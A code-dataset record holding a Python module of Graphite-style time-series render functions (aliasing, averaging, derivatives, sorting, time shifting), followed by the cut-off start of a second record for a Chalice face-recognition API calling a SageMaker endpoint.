\"\"\"\n for series in series_list:\n metric_pieces = re.search(\"(?:.*\\()?(?P[-\\w*\\.]+)(?:,|\\)?.*)?\",\n series.name).groups()[0].split('.')\n series.set_name(\".\".join(metric_pieces[n] for n in nodes))\n return series_list\n\n\n@api(\"aliasByMetric\")\ndef aliasByMetric(ctx, series_list):\n \"\"\"\n Takes a series_list and applies an alias derived from the base metric name.\n\n Example::\n\n &target=aliasByMetric(carbon.agents.graphite.creates)\n\n \"\"\"\n for series in series_list:\n series.set_name(series.name.split(\".\")[-1].split(\",\")[0])\n return series_list\n\n\n@api(\"aliasSub\")\ndef aliasSub(ctx, series_list, search, replace):\n \"\"\"\n Runs series names through a regex search/replace.\n\n Example::\n\n &target=aliasSub(ip.*TCP*,\"^.*TCP(\\d+)\",\"\\\\1\")\n \"\"\"\n try:\n series_list.name = re.sub(search, replace, series_list.name)\n except AttributeError:\n for series in series_list:\n series.name = re.sub(search, replace, series.name)\n return series_list\n \n\n@api(\"alpha\")\ndef alpha(ctx, series_list, alpha):\n \"\"\"\n Assigns the given alpha transparency setting to the series. Takes a float\n value between 0 and 1.\n \"\"\"\n for series in series_list:\n series.options['alpha'] = alpha\n return series_list\n\n\n@api(\"averageAbove\")\ndef averageAbove(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the metrics with an average value\n above N for the time period specified.\n\n Example::\n\n &target=averageAbove(server*.instance*.threads.busy,25)\n\n Draws the servers with average values above 25.\n\n \"\"\"\n return [s for s in series_list if s.average() >= n]\n\n\n@api(\"averageBelow\")\ndef averageBelow(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the metrics with an average value\n below N for the time period specified.\n\n Example::\n\n &target=averageBelow(server*.instance*.threads.busy,25)\n\n Draws the servers with average values below 25.\n\n \"\"\"\n return [s for s in series_list if s.average() <= n]\n\n\n@api(\"avg\", \"averageSeries\")\ndef averageSeries(ctx, *series_lists):\n \"\"\"\n Short Alias: avg()\n\n Takes one metric or a wildcard series_list.\n Draws the average value of all metrics passed at each time.\n\n Example::\n\n &target=averageSeries(company.server.*.threads.busy)\n\n \"\"\"\n def avg(p):\n if p:\n return sum(p) / len(p)\n else:\n return None\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"averageSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, avg, safe=True)]\n\n\n@api(\"averageSeriesWithWildcards\")\ndef averageSeriesWithWildcards(ctx, series_list, *positions):\n \"\"\"\n Call averageSeries after inserting wildcards at the given position(s).\n\n Example::\n\n &target=averageSeriesWithWildcards(\n host.cpu-[0-7].cpu-{user,system}.value, 1)\n\n This would be the equivalent of::\n\n &target=averageSeries(host.*.cpu-user.value)&target=averageSeries(\n host.*.cpu-system.value)\n\n \"\"\"\n matchedList = defaultdict(list)\n for series in series_list:\n newname = '.'.join(map(lambda x: x[1],\n filter(lambda i: i[0] not in positions,\n enumerate(series.name.split('.')))))\n matchedList[newname].append(series)\n result = []\n for name in matchedList:\n [series] = averageSeries(ctx, (matchedList[name]))\n series.set_name(name)\n result.append(series)\n return result\n\n\n@api(\"cactiStyle\")\ndef cactiStyle(ctx, series_list, system=None):\n \"\"\"\n Takes a series list and modifies the aliases to provide column aligned\n output with Current, Max, and Min values in the style of cacti. Optonally\n takes a \"system\" value to apply unit formatting in the same style as the\n Y-axis.\n NOTE: column alignment only works with monospace fonts such as terminus.\n\n Example::\n\n &target=cactiStyle(ganglia.*.net.bytes_out,\"si\")\n\n \"\"\"\n if system:\n fmt = lambda x: \"%.2f%s\" % format_units(x, system=system)\n else:\n fmt = lambda x: \"%.2f\" % x\n l_name = max([0] + [len(series.name) for series in series_list])\n l_last = max([0] + [len(fmt(int(series.last() or 3)))\n for series in series_list]) + 3\n max_len = max([0] + [len(fmt(int(series.max() or 3)))\n for series in series_list]) + 3\n min_len = max([0] + [len(fmt(int(series.min() or 3)))\n for series in series_list]) + 3\n for series in series_list:\n last = series.last()\n maximum = series.max()\n minimum = series.min()\n if last is None:\n last = NAN\n else:\n last = fmt(float(last))\n\n if maximum is None:\n maximum = NAN\n else:\n maximum = fmt(float(maximum))\n if minimum is None:\n minimum = NAN\n else:\n minimum = fmt(float(minimum))\n\n series.name = \"%*s Current:%*s Max:%*s Min:%*s \" % (\n -l_name, series.name, -l_last, last,\n -max_len, maximum, -min_len, minimum)\n return series_list\n\n\n@api(\"color\")\ndef color(ctx, series_list, color):\n \"\"\"\n Assigns the given color to the series_list\n\n Example::\n\n &target=color(collectd.hostname.cpu.0.user, 'green')\n &target=color(collectd.hostname.cpu.0.system, 'ff0000')\n &target=color(collectd.hostname.cpu.0.idle, 'gray')\n &target=color(collectd.hostname.cpu.0.idle, '6464ffaa')\n\n \"\"\"\n for series in series_list:\n series.color = color\n return series_list\n\n\n@api(\"dashed\")\ndef dashed(ctx, series_list, dash_length=5):\n \"\"\"\n Takes one metric or a wildcard series_list, followed by a float F.\n\n Draw the selected metrics with a dotted line with segments of length F\n If omitted, the default length of the segments is 5.0\n\n Example::\n\n &target=dashed(server01.instance01.memory.free,2.5)\n\n \"\"\"\n for series in series_list:\n series.set_name(\"dashed(%s, %d)\" % (series.name, dash_length))\n series.options['dashed'] = dash_length\n return series_list\n\n\n@api(\"countSeries\")\ndef countSeries(ctx, *series_lists):\n \"\"\"\n Draws a horizontal line representing the number of nodes found in the\n series_list.\n\n Example::\n\n &target=countSeries(carbon.agents.*.*)\n\n \"\"\"\n def count(a):\n return int(len(a))\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"countSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, count, safe=True)]\n\n\n@api(\"derivative\")\ndef derivative(ctx, series_list):\n \"\"\"\n This is the opposite of the integral function. This is useful for taking a\n running total metric and calculating the delta between subsequent data\n points.\n\n This function does not normalize for periods of time, as a true derivative\n would. Instead see the perSecond() function to calculate a rate of change\n over time.\n\n Example::\n\n &target=derivative(company.server.application01.ifconfig.TXPackets)\n\n Each time you run ifconfig, the RX and TXPackets are higher (assuming there\n is network traffic.) By applying the derivative function, you can get an\n idea of the packets per minute sent or received, even though you're only\n recording the total.\n \"\"\"\n results = []\n for series in series_list:\n new_values = []\n prev = None\n for val, t in series:\n if None in (prev, val):\n new_values += [(None, t)]\n prev = val\n continue\n new_values += [(val - prev, t)]\n prev = val\n name = \"derivative(%s)\" % series.name\n results += [\n TimeSeries(\"derivative(%s)\" % series.name,\n series.start, series.end, new_values)\n ]\n return results\n\n\n@api(\"diffSeries\")\ndef diffSeries(ctx, *series_lists):\n \"\"\"\n Can take two or more metrics.\n Subtracts parameters 2 through n from parameter 1.\n\n Example::\n\n &target=diffSeries(service.connections.total,\n service.connections.failed)\n\n \"\"\"\n def diff(values):\n return sum(\n [values[0] if values[0] is not None else 0] +\n [-v for v in values[1:] if v is not None]\n )\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"diffSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, diff)]\n\n\n@api(\"drawAsInfinite\")\ndef drawAsInfinite(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n If the value is zero, draw the line at 0. If the value is above zero, draw\n the line at infinity. If the value is null or less than zero, do not draw\n the line.\n\n Useful for displaying on/off metrics, such as exit codes. (0 = success,\n anything else = failure.)\n\n Example::\n\n drawAsInfinite(Testing.script.exitCode)\n\n \"\"\"\n for series in series_list:\n series.options[\"drawAsInfinite\"] = True\n series.set_name(\"drawAsInfinite(%s)\" % series.name)\n return series_list\n\n\n@api(\"highestAverage\")\ndef highestAverage(ctx, series_list, n=1):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the top N metrics with the highest\n average value for the time period specified.\n\n Example::\n\n &target=highestAverage(server*.instance*.threads.busy,5)\n\n Draws the top 5 servers with the highest average value.\n\n \"\"\"\n return sorted(series_list, key=lambda s: s.average())[-n:]\n\n\n@api(\"identity\", \"time\", \"timeFunction\")\ndef identity(ctx, name):\n \"\"\"\n Identity function:\n Returns datapoints where the value equals the timestamp of the datapoint.\n Useful when you have another series where the value is a timestamp, and\n you want to compare it to the time of the datapoint, to render an age\n\n Example::\n\n &target=identity(\"The.time.series\")\n\n This would create a series named \"The.time.series\" that contains points\n where x(t) == t.\n \"\"\"\n step = 60\n start = int(epoch(ctx[\"startTime\"]))\n end = int(epoch(ctx[\"endTime\"]))\n return [\n TimeSeries(\n \"identity(%s)\" % name,\n epoch(ctx[\"startTime\"]),\n epoch(ctx[\"endTime\"]),\n [(t, t) for t in range(start, end, step)]\n )\n ]\n\n\n@api(\"integral\")\ndef integral(ctx, series_list):\n \"\"\"\n This will show the sum over time, sort of like a continuous addition\n function. Useful for finding totals or trends in metrics that are\n collected per minute.\n\n Example::\n\n &target=integral(company.sales.perMinute)\n\n This would start at zero on the left side of the graph, adding the sales\n each minute, and show the total sales for the time period selected at the\n right side, (time now, or the time specified by '&until=').\n \"\"\"\n def integrate(v):\n current[0] += v\n return current[0]\n\n for series in series_list:\n current = [0.0]\n series.apply(integrate)\n series.set_name(\"integral(%s)\" % series.name)\n return series_list\n\n\n@api(\"isNonNull\")\ndef isNonNull(ctx, series_list):\n \"\"\"\n Takes a metric or wild card series_list and counts up how many\n non-null values are specified. This is useful for understanding\n which metrics have data at a given point in time (ie, to count\n which servers are alive).\n\n Example::\n\n &target=isNonNull(webapp.pages.*.views)\n\n Returns a series_list where 1 is specified for non-null values, and\n 0 is specified for null values.\n \"\"\"\n\n def indicator(v):\n if v is None:\n return 0\n else:\n return 1\n\n for series in series_list:\n series.apply(indicator, safe=False)\n series.set_name = \"isNonNull(%s)\" % series.name\n return series_list\n\n\n@api(\"invert\")\ndef invert(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list, and inverts each datapoint\n (i.e. 1/x).\n\n Example::\n\n &target=invert(Server.instance01.threads.busy)\n\n \"\"\"\n for series in series_list:\n series.set_name(\"invert(%s)\" % (series.name))\n series.apply(lambda x: 1 / x if x else None)\n return series_list\n\n\n@api(\"lineWidth\")\ndef lineWidth(ctx, series_list, width):\n \"\"\"\n Takes one metric or a wildcard series_list, followed by a float F.\n\n Draw the selected metrics with a line width of F, overriding the default\n value of 1, or the &lineWidth=X.X parameter.\n\n Useful for highlighting a single metric out of many, or having multiple\n line widths in one graph.\n\n Example::\n\n &target=lineWidth(server01.instance01.memory.free,5)\n\n \"\"\"\n for series in series_list:\n series.options['lineWidth'] = width\n return series_list\n\n\n@api(\"limit\")\ndef limit(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n\n Only draw the first N metrics. Useful when testing a wildcard in a\n metric.\n\n Example::\n\n &target=limit(server*.instance*.memory.free,5)\n\n Draws only the first 5 instance's memory free.\n\n \"\"\"\n return series_list[0:n]\n\n\n@api(\"log\")\ndef logarithm(ctx, series_list, base=10):\n \"\"\"\n Takes one metric or a wildcard series_list, a base, and draws the y-axis in\n logarithmic format. If base is omitted, the function defaults to base 10.\n\n Example::\n\n &target=log(carbon.agents.hostname.avgUpdateTime,2)\n\n \"\"\"\n def l(v):\n if v <= 0:\n return None\n else:\n return math.log(v, base)\n\n base = int(base)\n for series in series_list:\n series.set_name(\"log(%s, %s)\" % (series.name, base))\n series.apply(l)\n return series_list\n\n\n@api(\"lowestAverage\")\ndef lowestAverage(ctx, series_list, n=1):\n \"\"\"\n Takes one metric or a wildcard series_list followed by an integer N.\n Out of all metrics passed, draws only the bottom N metrics with the lowest\n average value for the time period specified.\n\n Example::\n\n &target=lowestAverage(server*.instance*.threads.busy,5)\n\n Draws the bottom 5 servers with the lowest average value.\n\n \"\"\"\n return sorted(series_list, key=lambda s: s.average())[:n]\n\n\n@api(\"map\")\ndef mapSeries(ctx, series_list, mapNode):\n \"\"\"\n Takes a series_list and maps it to a list of sub-series_list. Each\n sub-series_list has the given mapNode in common.\n\n Example::\n\n map(servers.*.cpu.*,1) =>\n [\n servers.server1.cpu.*,\n servers.server2.cpu.*,\n ...\n servers.serverN.cpu.*\n ]\n \"\"\"\n metaSeries = {}\n keys = []\n for series in series_list:\n key = series.name.split(\".\")[mapNode]\n if key not in metaSeries:\n metaSeries[key] = [series]\n keys.append(key)\n else:\n metaSeries[key].append(series)\n return [metaSeries[k] for k in keys]\n\n\n@api(\"maximumAbove\")\ndef maximumAbove(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a maximum value above n.\n\n Example::\n\n &target=maximumAbove(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which at one point sent more than\n 1000 packets/min.\n \"\"\"\n return [s for s in series_list if s.max() > n]\n\n\n@api(\"maximumBelow\")\ndef maximumBelow(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a maximum value below n.\n\n Example::\n\n &target=maximumBelow(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which always sent less than 1000\n packets/min.\n \"\"\"\n return [s for s in series_list if s.max() <= n]\n\n\n@api(\"maxSeries\")\ndef maxSeries(ctx, *series_lists):\n \"\"\"\n Takes one metric or a wildcard series_list. For each datapoint from each\n metric passed in, pick the maximum value and graph it.\n\n Example::\n\n &target=maxSeries(Server*.connections.total)\n\n \"\"\"\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"maxSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, max, safe=True)]\n\n\n@api(\"minumumAbove\")\ndef minimumAbove(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a minimum value above n.\n\n Example::\n\n &target=minimumAbove(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which always sent more than 1000\n packets/min.\n \"\"\"\n return [s for s in series_list if s.min() > n]\n\n\n@api(\"minimumBelow\")\ndef minimumBelow(ctx, series_list, n):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant n.\n Draws only the metrics with a minimum value below n.\n\n Example::\n\n &target=minimumBelow(system.interface.eth*.packetsSent,1000)\n\n This would only display interfaces which sent at one point less than\n 1000 packets/min.\n \"\"\"\n return [s for s in series_list if s.min() <= n]\n\n\n@api(\"minSeries\")\ndef minSeries(ctx, *series_lists):\n \"\"\"\n Takes one metric or a wildcard series_list.\n For each datapoint from each metric passed in, pick the minimum value and\n graph it.\n\n Example::\n\n &target=minSeries(Server*.connections.total)\n \"\"\"\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"minSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, min, safe=True)]\n\n\n@api(\"multiplySeries\")\ndef multiplySeries(ctx, *series_lists):\n \"\"\"\n Takes two or more series and multiplies their points. A constant may not be\n used. To multiply by a constant, use the scale() function.\n\n Example::\n\n &target=multiplySeries(Series.dividends,Series.divisors)\n\n\n \"\"\"\n def mul(*factors):\n if None in factors:\n return None\n\n product = 1\n for factor in factors:\n product *= float(factor)\n return product\n\n if is_empty(series_lists):\n return []\n if len(series_lists) == 1:\n return series_lists\n name, series_lists = normalize(\"multiplySeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, mul, safe=True)]\n\n\n@api(\"nonNegativeDerivative\")\ndef nonNegativeDerivative(ctx, series_list, max_value=None):\n \"\"\"\n Same as the derivative function above, but ignores datapoints that trend\n down. Useful for counters that increase for a long time, then wrap or\n reset. (Such as if a network interface is destroyed and recreated by\n unloading and re-loading a kernel module, common with USB / WiFi cards.\n\n Example::\n\n &target=nonNegativederivative(\n company.server.application01.ifconfig.TXPackets)\n\n \"\"\"\n results = []\n\n for series in series_list:\n new_values = []\n prev = None\n for val, t in series:\n if None in (prev, val):\n new_values.append(None)\n prev = val\n continue\n diff = val - prev\n if diff >= 0:\n new_values.append(diff)\n elif max_value is not None and max_value >= val:\n new_values.append((max_value - prev) + val + 1)\n else:\n new_values.append(None)\n prev = val\n results += [\n TimeSeries(\"nonNegativeDerivative(%s)\" % series.name,\n series.start, series.end, new_values)\n ]\n return results\n\n\n@api(\"nPercentile\")\ndef nPercentile(ctx, series_list, n):\n \"\"\"Returns n-percent of each series in the series_list.\"\"\"\n assert n, \"The requested percent is required to be greater than 0\"\n\n results = []\n for s in series_list:\n pv = get_percentile(s, n)[0]\n if pv is not None:\n name = \"nPercentile(%s, %g)\" % (s.name, n)\n ps = TimeSeries(\n name, s.start, s.end,\n [(pv, t) for _, t in s]\n )\n ps.pathExpression = name\n results += [ps]\n return results\n\n\n@api(\"offset\")\ndef offset(ctx, series_list, factor):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant, and adds\n the constant to each datapoint.\n\n Example::\n\n &target=offset(Server.instance01.threads.busy,10)\n\n \"\"\"\n factor = float(factor)\n for series in series_list:\n series.set_name(\"offset(%s,%g)\" % (series.name, float(factor)))\n series.apply(lambda x: x + factor)\n return series_list\n\n\n@api(\"offsetToZero\")\ndef offsetToZero(ctx, series_list):\n \"\"\"\n Offsets a metric or wildcard series_list by subtracting the minimum\n value in the series from each datapoint.\n\n Useful to compare different series where the values in each series\n may be higher or lower on average but you're only interested in the\n relative difference.\n\n An example use case is for comparing different round trip time\n results. When measuring RTT (like pinging a server), different\n devices may come back with consistently different results due to\n network latency which will be different depending on how many\n network hops between the probe and the device. To compare different\n devices in the same graph, the network latency to each has to be\n factored out of the results. This is a shortcut that takes the\n fastest response (lowest number in the series) and sets that to zero\n and then offsets all of the other datapoints in that series by that\n amount. This makes the assumption that the lowest response is the\n fastest the device can respond, of course the more datapoints that\n are in the series the more accurate this assumption is.\n\n Example::\n\n &target=offsetToZero(Server.instance01.responseTime)\n &target=offsetToZero(Server.instance*.responseTime)\n\n \"\"\"\n for series in series_list:\n series.set_name(\"offsetToZero(%s)\" % series.name)\n sm = series.min()\n for s in series_list:\n s.apply(lambda v: v - sm)\n return series_list\n\n\n@api(\"percentileOfSeries\")\ndef percentileOfSeries(ctx, series_lists, n, interpolate=False):\n \"\"\"\n percentileOfSeries returns a single series which is composed of the\n n-percentile values taken across a wildcard series at each point.\n Unless `interpolate` is set to True, percentile values are actual values\n contained in one of the supplied series.\n \"\"\"\n if n <= 0:\n raise ValueError(\n 'The requested percent is required to be greater than 0')\n\n if not series_lists:\n return []\n _, series_lists = normalize(\"percentileOfSeries\", series_lists)\n name = \"percentileOfSeries(%s,%g)\" % (series_lists[0].pathExpression, n)\n return [\n TimeSeries.fit_map(\n name, series_lists,\n lambda x: get_percentile(x, n, interpolate),\n safe=True\n )\n ]\n\n\n@api(\"randomWalk\", \"randomWalkFunction\")\ndef randomWalkFunction(ctx, name):\n \"\"\"\n Short Alias: randomWalk()\n\n Returns a random walk starting at 0. This is great for testing when there\n is no real data in whisper.\n\n Example::\n\n &target=randomWalk(\"The.time.series\")\n\n This would create a series named \"The.time.series\" that contains points\n where x(t) == x(t-1)+random()-0.5, and x(0) == 0.\n \"\"\"\n step = 60\n delta = datetime.timedelta(seconds=step)\n when = ctx[\"startTime\"]\n values = []\n current = 0\n while when < ctx[\"endTime\"]:\n t = epoch(when)\n values += [(current, t)]\n current += random.random() - 0.5\n when += delta\n return [\n TimeSeries(\n \"randomWalk(%s)\" % name,\n epoch(ctx[\"startTime\"]),\n epoch(ctx[\"endTime\"]),\n values\n )\n ]\n\n\n@api(\"rangeOfSeries\")\ndef rangeOfSeries(ctx, *series_lists):\n \"\"\"\n Takes a wildcard series_list.\n Distills down a set of inputs into the range of the series\n\n Example::\n\n &target=rangeOfSeries(Server*.connections.total)\n\n \"\"\"\n def rng(a):\n min_a = min(a)\n max_a = max(a)\n if min_a is None or max_a is None:\n return None\n else:\n return max_a - min_a\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"rangeOfSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, rng, safe=True)]\n\n\n@api(\"secondYAxis\")\ndef secondYAxis(ctx, series_list):\n \"\"\"\n Graph the series on the secondary Y axis.\n \"\"\"\n for series in series_list:\n series.options[\"secondYAxis\"] = True\n series.set_name(\"secondYAxis(%s)\" % series.name)\n return series_list\n\n\n@api(\"scale\")\ndef scale(ctx, series_list, factor):\n \"\"\"\n Takes one metric or a wildcard series_list followed by a constant, and\n multiplies the datapoint by the constant provided at each point.\n\n Example::\n\n &target=scale(Server.instance01.threads.busy,10)\n &target=scale(Server.instance*.threads.busy,10)\n\n \"\"\"\n factor = float(factor)\n for series in series_list:\n series.set_name(\"scale(%s,%g)\" % (series.name, float(factor)))\n series.apply(lambda x: x * factor)\n return series_list\n\n\n@api(\"sin\", \"sinFunction\")\ndef sinFunction(ctx, name, amplitude=1):\n \"\"\"\n Short Alias: sin()\n\n Just returns the sine of the current time. The optional amplitude parameter\n changes the amplitude of the wave.\n\n Example::\n\n &target=sin(\"The.time.series\", 2)\n\n This would create a series named \"The.time.series\" that contains sin(x)*2.\n \"\"\"\n step = 60\n delta = datetime.timedelta(seconds=step)\n when = ctx[\"startTime\"]\n values = []\n while when < ctx[\"endTime\"]:\n t = epoch(when)\n values += [(math.sin(t) * amplitude, t)]\n when += delta\n return [\n TimeSeries(\n \"sin(%s)\" % name,\n epoch(ctx[\"startTime\"]),\n epoch(ctx[\"endTime\"]),\n values\n )\n ]\n\n@api(\"sortByName\")\ndef sortByName(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the metric name.\n \"\"\"\n return list(sorted(series_list, key=lambda x: x.name))\n\n\n@api(\"sortByTotal\")\ndef sortByTotal(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the sum of values across the time period\n specified.\n \"\"\"\n return list(sorted(series_list, key=sum, reverse=True))\n\n\n@api(\"stddevSeries\")\ndef stddevSeries(ctx, *series_lists):\n \"\"\"\n\n Takes one metric or a wildcard series_list.\n Draws the standard deviation of all metrics passed at each time.\n\n Example::\n\n &target=stddevSeries(company.server.*.threads.busy)\n\n \"\"\"\n def stddev(a):\n sm = sum(a)\n ln = len(a)\n avg = sm / ln\n s = 0\n for v in a:\n s += (v - avg) ** 2\n return math.sqrt(s / ln)\n\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"stddevSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, stddev, safe=True)]\n\n\n@api(\"sum\", \"sumSeries\")\ndef sumSeries(ctx, *series_lists):\n \"\"\"\n Short form: sum()\n\n This will add metrics together and return the sum at each datapoint. (See\n integral for a sum over time)\n\n Example::\n\n &target=sum(company.server.application*.requestsHandled)\n\n This would show the sum of all requests handled per minute (provided\n requestsHandled are collected once a minute). If metrics with different\n retention rates are combined, the coarsest metric is graphed, and the sum\n of the other metrics is averaged for the metrics with finer retention\n rates.\n\n \"\"\"\n if is_empty(series_lists):\n return []\n name, series_lists = normalize(\"sumSeries\", series_lists)\n return [TimeSeries.fit_map(name, series_lists, sum, safe=True)]\n\n\n@api(\"sortByMaxima\")\ndef sortByMaxima(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the maximum value across the time period\n specified. Useful with the &areaMode=all parameter, to keep the\n lowest value lines visible.\n\n Example::\n\n &target=sortByMaxima(server*.instance*.memory.free)\n\n \"\"\"\n return list(sorted(series_list, key=lambda s: s.max()))\n\n\n@api(\"sortByMinima\")\ndef sortByMinima(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the lowest value across the time period\n specified.\n\n Example::\n\n &target=sortByMinima(server*.instance*.memory.free)\n\n \"\"\"\n return list(sorted(series_list, key=lambda s: s.min()))\n\n\n@api(\"sortByTotal\")\ndef sortByTotal(ctx, series_list):\n \"\"\"\n Takes one metric or a wildcard series_list.\n\n Sorts the list of metrics by the sum of values across the time period\n specified.\n \"\"\"\n def safe_sum(s):\n return sum(v[0] for v in s if v[0])\n\n return list(sorted(series_list, key=safe_sum, reverse=True))\n\n\n@api(\"time_shift\")\ndef time_shift(ctx, series_list, time_shift, reset_end=True):\n \"\"\"\n Takes one metric or a wildcard series_list, followed by a quoted string\n with the length of time (See ``from / until`` in the render\\_api_ for\n examples of time formats).\n\n Draws the selected metrics shifted in time. If no sign is given, a minus\n sign ( - ) is implied which will shift the metric back in time. If a plus\n sign ( + ) is given, the metric will be shifted forward in time.\n\n Will reset the end date range automatically to the end of the base stat\n unless reset_end is False. Example case is when you timeshift to last week\n and have the graph date range set to include a time in the future, will\n limit this timeshift to pretend ending at the current time. If reset_end is\n False, will instead draw full range including future time.\n\n Useful for comparing a metric against itself at a past periods or\n correcting data stored at an offset.\n\n Example::\n\n &target=time_shift(Sales.widgets.largeBlue,\"7d\")\n &target=time_shift(Sales.widgets.largeBlue,\"-7d\")\n &target=time_shift(Sales.widgets.largeBlue,\"+1h\")\n\n \"\"\"\n from graphite.evaluator import evaluateTarget\n\n if not series_list:\n return []\n # Default to negative. parseTimeOffset defaults to +\n if time_shift[0].isdigit():\n time_shift = '-' + time_shift\n delta = parseTimeOffset(time_shift)\n new_ctx = ctx.copy()\n new_ctx['startTime'] = ctx['startTime'] + delta\n new_ctx['endTime'] = ctx['endTime'] + delta\n results = []\n # if len(series_list) > 1, they will all have the same pathExpression,\n # which is all we care about.\n series = series_list[0]\n for shifted_series in evaluateTarget(new_ctx, series.pathExpression):\n shifted_series.set_name('time_shift(%s, %s)' % (\n shifted_series.name, time_shift))\n if reset_end:\n shifted_series.end = series.end\n else:\n shifted_series.end = (\n shifted_series.end - shifted_series.start + series.start)\n shifted_series.start = series.start\n results += [shifted_series]\n return results\n\n\n@api(\"sumSeriesWithWildcards\")\ndef sumSeriesWithWildcards(ctx, series_list, *positions):\n \"\"\"\n Call sumSeries after inserting wildcards at the given position(s).\n\n Example::\n\n &target=sumSeriesWithWildcards(host.cpu-[0-7].cpu-{user,system}.value,\n 1)\n\n This would be the equivalent of::\n\n &target=sumSeries(host.*.cpu-user.value)&target=sumSeries(\n host.*.cpu-system.value)\n\n \"\"\"\n newSeries = {}\n new_names = list()\n\n for series in series_list:\n newname = '.'.join(map(lambda x: x[1],\n filter(lambda i: i[0] not in positions,\n enumerate(series.name.split('.')))))\n if newname in newSeries:\n newSeries[newname] = sumSeries(ctx,\n (series, newSeries[newname]))[0]\n else:\n newSeries[newname] = series\n new_names.append(newname)\n newSeries[newname].name = newname\n\n return [newSeries[name] for name in new_names]\n\n\n@api(\"transformNull\")\ndef transformNull(ctx, series_list, default=0):\n \"\"\"\n Takes a metric or wild card series_list and an optional value\n to transform Nulls to. Default is 0. This method compliments\n drawNullAsZero flag in graphical mode but also works in text only\n mode.\n\n Example::\n\n &target=transformNull(webapp.pages.*.views,-1)\n\n This would take any page that didn't have values and supply negative 1 as\n a default. Any other numeric value may be used as well.\n \"\"\"\n def transform(v):\n if v is None:\n return default\n else:\n return v\n\n for series in series_list:\n series.apply(transform, safe=False)\n series.set_name(\"transformNull(%s,%g)\" % (series.name, default))\n return series_list\n\n## Graphite functions to be ported from graphite/functions\n## Remove appropriative lines for ported functions\n# # Combine functions\n# 'weightedAverage': weightedAverage,\n# # Transform functions\n# 'scaleToSeconds': scaleToSeconds,\n# 'perSecond': perSecond,\n# 'timeStack': timeStack,\n# 'summarize': summarize,\n# 'smartSummarize': smartSummarize,\n# 'hitcount': hitcount,\n# # Calculate functions\n# 'movingAverage': movingAverage,\n# 'movingMedian': movingMedian,\n# 'stdev': stdev,\n# 'holtWintersForecast': holtWintersForecast,\n# 'holtWintersConfidenceBands': holtWintersConfidenceBands,\n# 'holtWintersConfidenceArea': holtWintersConfidenceArea,\n# 'holtWintersAberration': holtWintersAberration,\n# 'asPercent': asPercent,\n# 'pct': asPercent,\n# 'diffSeries': diffSeries,\n# 'divideSeries': divideSeries,\n# # Series Filter functions\n# 'mostDeviant': mostDeviant,\n# 'highestCurrent': highestCurrent,\n# 'lowestCurrent': lowestCurrent,\n# 'highestMax': highestMax,\n# 'currentAbove': currentAbove,\n# 'currentBelow': currentBelow,\n# 'averageOutsidePercentile': averageOutsidePercentile,\n# 'removeBetweenPercentile': removeBetweenPercentile,\n# 'sortByMaxima': sortByMaxima,\n# 'sortByMinima': sortByMinima,\n# 'useSeriesAbove': useSeriesAbove,\n# 'exclude': exclude,\n# # Data Filter functions\n# 'removeAbovePercentile': removeAbovePercentile,\n# 'removeAboveValue': removeAboveValue,\n# 'removeBelowPercentile': removeBelowPercentile,\n# 'removeBelowValue': removeBelowValue,\n# # Special functions\n# 'legendValue': legendValue,\n# 'cumulative': cumulative,\n# 'consolidateBy': consolidateBy,\n# 'keepLastValue': keepLastValue,\n# 'changed': changed,\n# 'secondYAxis': secondYAxis,\n# 'substr': substr,\n# 'group': group,\n# 'reduce': reduceSeries,\n# 'groupByNode': groupByNode,\n# 'constantLine': constantLine,\n# 'stacked': stacked,\n# 'areaBetween': areaBetween,\n# 'threshold': threshold,\n# 'aggregateLine': aggregateLine\n","sub_path":"pm/apps/render/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":39293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"325872511","text":"from io import BytesIO\nimport json\nimport cgi\nimport os\n\nfrom chalice import Chalice\n\nimport boto3\nfrom email.message import Message\n\napp = Chalice(app_name='face-recognition-api')\napp.debug = True\n\nclient = boto3.client('runtime.sagemaker',\n\t\t\t\t\t region_name = \"eu-west-2\") # Remember that region has to be exactly the same everywhere\n\n\"\"\"Function, which is automatically trigerred when the endpoint receives a POST request.\n It accepts only 'multipart/form-data' request type, otherwise it returns an error code. \n\n Returns:\n Response - it contains a list of students present in the class, confidence and face coordinates for 